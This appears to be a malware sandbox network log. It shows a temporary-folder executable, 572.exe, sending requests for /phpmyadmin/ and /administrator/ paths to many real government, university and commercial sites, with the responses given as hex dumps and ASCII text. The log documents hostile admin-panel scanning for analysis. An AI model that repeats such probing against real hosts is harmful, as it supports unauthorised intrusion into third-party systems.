                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC170OUTGET /en HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: genshin.mihoyo.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC669INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: Tuser
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Date: Wed, 10 Jan 2024 20:53:40 GMT
                                                                                                                                                                                                                                                                                                                                                                Ali-Swift-Global-Savetime: 1704920020
                                                                                                                                                                                                                                                                                                                                                                Via: cache10.l2us2[0,0,304-0,H], cache17.l2us2[1,0], ens-cache13.us19[0,0,200-0,H], ens-cache15.us19[1,0]
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                ETag: "f912-dq4rmbBoQ4BeSBaKE+RvH8X/c54"
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Age: 2211673
                                                                                                                                                                                                                                                                                                                                                                X-Cache: HIT TCP_MEM_HIT dirn:12:716686692
                                                                                                                                                                                                                                                                                                                                                                X-Swift-SaveTime: Sat, 03 Feb 2024 01:20:12 GMT
                                                                                                                                                                                                                                                                                                                                                                X-Swift-CacheTime: 588808
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                EagleId: 082d34a317071316934228487e
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC7002INData Raw: 31 62 35 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 6e 2d 68 65 61 64 2d 73 73 72 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 74 72 75 65 22 3e 47 65 6e 73 68 69 6e 20 49 6d 70 61 63 74 20 e2 80 93 20 53 74 65 70 20 49 6e 74 6f 20 61 20 56 61 73 74 20 4d 61 67 69 63 61 6c 20 57 6f 72 6c 64 20 6f 66 20 41 64 76 65 6e 74 75 72 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 74 72 75 65 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 74 72 75 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1b52<!doctype html><html data-n-head-ssr data-n-head=""><head><title data-n-head="true">Genshin Impact Step Into a Vast Magical World of Adventure</title><meta data-n-head="true" charset="utf-8"><meta data-n-head="true" http-equiv="X-UA-Compatibl
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC16384INData Raw: 37 66 64 35 0d 0a 43 41 31 4d 43 41 32 4e 53 6b 69 4c 7a 34 38 63 6d 56 6a 64 43 42 33 61 57 52 30 61 44 30 69 4e 79 49 67 61 47 56 70 5a 32 68 30 50 53 49 79 4d 43 49 67 65 44 30 69 4e 44 59 75 4e 53 49 67 65 54 30 69 4e 44 41 69 49 47 5a 70 62 47 77 39 49 69 4e 44 4d 6b 4d 77 51 7a 45 69 49 48 4a 34 50 53 49 31 49 69 42 79 65 54 30 69 4e 53 49 67 64 48 4a 68 62 6e 4e 6d 62 33 4a 74 50 53 4a 79 62 33 52 68 64 47 55 6f 4c 54 45 31 4d 43 41 30 4e 53 34 35 4f 43 41 32 4e 53 6b 69 4c 7a 34 38 63 6d 56 6a 64 43 42 33 61 57 52 30 61 44 30 69 4e 79 49 67 61 47 56 70 5a 32 68 30 50 53 49 79 4d 43 49 67 65 44 30 69 4e 44 59 75 4e 53 49 67 65 54 30 69 4e 44 41 69 49 47 5a 70 62 47 77 39 49 69 4e 44 51 6b 4e 43 51 30 49 69 49 48 4a 34 50 53 49 31 49 69 42 79 65 54
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7fd5CA1MCA2NSkiLz48cmVjdCB3aWR0aD0iNyIgaGVpZ2h0PSIyMCIgeD0iNDYuNSIgeT0iNDAiIGZpbGw9IiNDMkMwQzEiIHJ4PSI1IiByeT0iNSIgdHJhbnNmb3JtPSJyb3RhdGUoLTE1MCA0NS45OCA2NSkiLz48cmVjdCB3aWR0aD0iNyIgaGVpZ2h0PSIyMCIgeD0iNDYuNSIgeT0iNDAiIGZpbGw9IiNDQkNCQ0IiIHJ4PSI1IiByeT
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC16349INData Raw: 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 2e 72 6f 6f 74 20 2e 70 76 5f 5f 76 69 64 65 6f 2d 2d 6d 6f 64 61 6c 20 69 66 72 61 6d 65 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 2e 72 6f 6f 74 20 2e 70 76 5f 5f 76 69 64 65 6f 2d 2d 63 6c 6f 73 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 2d 36 32 70 78 3b 74 6f 70 3a 31 30 70 78 3b 77 69 64 74 68 3a 33 32 70 78 3b 68 65 69 67 68 74 3a 33 32 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 20 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 43 41
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: sition:relative;width:100%;height:100%}.root .pv__video--modal iframe{width:100%;height:100%}.root .pv__video--close{position:absolute;right:-62px;top:10px;width:32px;height:32px;background:transparent url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACA
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC16384INData Raw: 35 64 62 38 0d 0a 75 73 20 64 c3 a9 63 6f 75 76 72 69 72 65 7a 20 6c 65 20 6d 6f 6e 64 65 20 66 61 6e 74 61 73 74 69 71 75 65 20 64 65 20 54 65 79 76 61 74 2c 20 65 74 20 76 6f 73 20 70 61 73 20 76 6f 75 73 20 70 6f 72 74 65 72 6f 6e 74 20 c3 a0 20 74 72 61 76 65 72 73 20 73 65 70 74 20 70 61 79 73 20 c3 a0 20 6c 61 20 72 65 6e 63 6f 6e 74 72 65 20 64 65 20 76 6f 79 61 67 65 75 72 73 20 64 65 20 74 6f 75 73 20 68 6f 72 69 7a 6f 6e 73 2c 20 71 75 69 20 76 6f 75 73 20 61 63 63 6f 6d 70 61 67 6e 65 72 6f 6e 74 20 64 61 6e 73 20 76 6f 73 20 63 6f 6d 62 61 74 73 20 65 74 20 76 6f 74 72 65 20 71 75 c3 aa 74 65 2e 20 45 78 70 6c 6f 72 65 7a 20 6c 69 62 72 65 6d 65 6e 74 20 6c 65 73 20 64 69 66 66 c3 a9 72 65 6e 74 65 73 20 63 6f 6e 74 72 c3 a9 65 73 20 64 65 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 5db8us dcouvrirez le monde fantastique de Teyvat, et vos pas vous porteront travers sept pays la rencontre de voyageurs de tous horizons, qui vous accompagneront dans vos combats et votre qute. Explorez librement les diffrentes contres de
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC7616INData Raw: 74 66 72 6f 6d 20 67 61 6d 65 3b 20 67 72 65 61 74 20 6d 6f 62 69 6c 65 20 67 61 6d 65 3b 20 62 65 73 74 20 6d 6f 62 69 6c 65 20 67 61 6d 65 3b 20 73 61 6e 64 62 6f 78 20 61 64 76 65 6e 74 75 72 65 20 52 50 47 3b 20 6d 75 6c 74 69 70 6c 65 20 70 6c 61 74 66 6f 72 6d 73 3b 20 6d 75 6c 74 69 70 6c 61 79 65 72 20 6d 6f 62 69 6c 65 20 67 61 6d 65 3b 20 41 52 50 47 3b 20 63 72 6f 73 73 70 6c 61 79 3b 20 67 61 6d 65 20 63 6f 73 70 6c 61 79 3b 20 63 6f 73 70 6c 61 79 3b 20 6e 65 77 20 67 61 6d 65 20 32 30 32 30 3b 20 62 65 73 74 20 67 61 6d 65 20 32 30 32 30 3b 20 69 73 65 6b 61 69 3b 20 63 65 6c 20 73 68 61 64 65 3b 20 63 65 6c 20 73 68 61 64 65 64 3b 20 77 61 69 66 75 3b 20 68 61 72 65 6d 3b 20 67 65 6e 73 68 69 6e 20 70 72 65 2d 72 65 67 69 73 74 65 72 3b 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tfrom game; great mobile game; best mobile game; sandbox adventure RPG; multiple platforms; multiplayer mobile game; ARPG; crossplay; game cosplay; cosplay; new game 2020; best game 2020; isekai; cel shade; cel shaded; waifu; harem; genshin pre-register;
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                96192.168.2.655878104.18.41.153443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC175OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: app.plex.tv
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC346INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7baea40701-ATL
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC168INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                97192.168.2.654612190.152.216.14443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC182OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: srienlinea.sri.gob.ec
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1805
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: f5_cspm=1234;;
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC246INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 52 65 71 75 65 73 74 20 52 65 6a 65 63 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 72 65 6a 65 63 74 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 73 75 6c 74 20 77 69 74 68 20 79 6f 75 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 62 72 3e 3c 62 72 3e 59 6f 75 72 20 73 75 70 70 6f 72 74 20 49 44 20 69 73 3a 20 32 31 38 37 34 30 37 33 39 34 39 36 39 34 36 39 32 33 31 3c 62 72 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 27 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 27 3e 5b 47 6f 20 42 61 63 6b 5d 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>Request Rejected</title></head><body>The requested URL was rejected. Please consult with your administrator.<br><br>Your support ID is: 2187407394969469231<br><br><a href='javascript:history.back();'>[Go Back]</a></body></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC1559INData Raw: 3c 73 63 72 69 70 74 20 69 64 3d 22 66 35 5f 63 73 70 6d 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 66 35 5f 63 73 70 6d 3d 7b 66 35 5f 70 3a 27 4f 4b 4d 47 47 4b 43 44 4b 48 43 4d 4c 46 44 41 48 4d 4e 4f 41 4b 4c 44 42 4d 4c 44 49 4c 45 4f 48 49 44 47 4f 41 50 4e 41 4d 4a 4f 4b 41 44 4b 43 4a 4a 43 4e 45 45 44 4e 4a 43 49 4c 4f 4f 42 50 41 4c 42 4b 42 46 46 41 41 4a 4c 50 4d 4d 4d 49 4d 4c 41 47 4d 50 49 41 41 41 4d 45 45 4b 48 47 42 4c 44 46 4c 45 42 4b 4f 50 45 4f 43 50 4f 45 49 4a 45 49 47 47 4e 4a 45 47 46 43 46 4f 47 27 2c 73 65 74 43 68 61 72 41 74 3a 66 75 6e 63 74 69 6f 6e 28 73 74 72 2c 69 6e 64 65 78 2c 63 68 72 29 7b 69 66 28 69 6e 64 65 78 3e 73 74 72 2e 6c 65 6e 67 74 68 2d 31 29 72 65 74 75 72 6e 20 73 74 72 3b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script id="f5_cspm">(function(){var f5_cspm={f5_p:'OKMGGKCDKHCMLFDAHMNOAKLDBMLDILEOHIDGOAPNAMJOKADKCJJCNEEDNJCILOOBPALBKBFFAAJLPMMMIMLAGMPIAAAMEEKHGBLDFLEBKOPEOCPOEIJEIGGNJEGFCFOG',setCharAt:function(str,index,chr){if(index>str.length-1)return str;return


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                98192.168.2.65526620.231.114.24443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.mojang.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC189INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.minecraft.net/
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                99192.168.2.65611154.85.194.183443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC185OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC197INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 7358
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                ETag: "5df8f9a3-1cbe"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC7358INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d e2 80 9c 73 74 79 6c 65 73 68 65 65 74 e2 80 9d 20 68 72 65 66 3d e2 80 9c 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 6e 6b 77 33 70 6c 72 2e 63 73 73 e2 80 9c 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 2c 20 2a 3a 62 65 66 6f 72 65 2c 20 2a 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Document</title> <link rel=stylesheet href=https://use.typekit.net/nkw3plr.css> <style> *, *:before, *:after { box-sizing: border-box; position: rel


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                100192.168.2.655083177.74.1.157443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sistemas.pa.gov.br
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC164INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC196INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                101192.168.2.654997201.134.41.61443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: academico.um.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC180INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 282
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC282INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 63 61 64 65 6d 69 63 6f 2e 75 6d 2e 65 64 75 2e 6d 78 20 50 6f 72 74 20 34 34
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at academico.um.edu.mx Port 44


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                102192.168.2.656456184.25.164.103443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC172OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1812INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
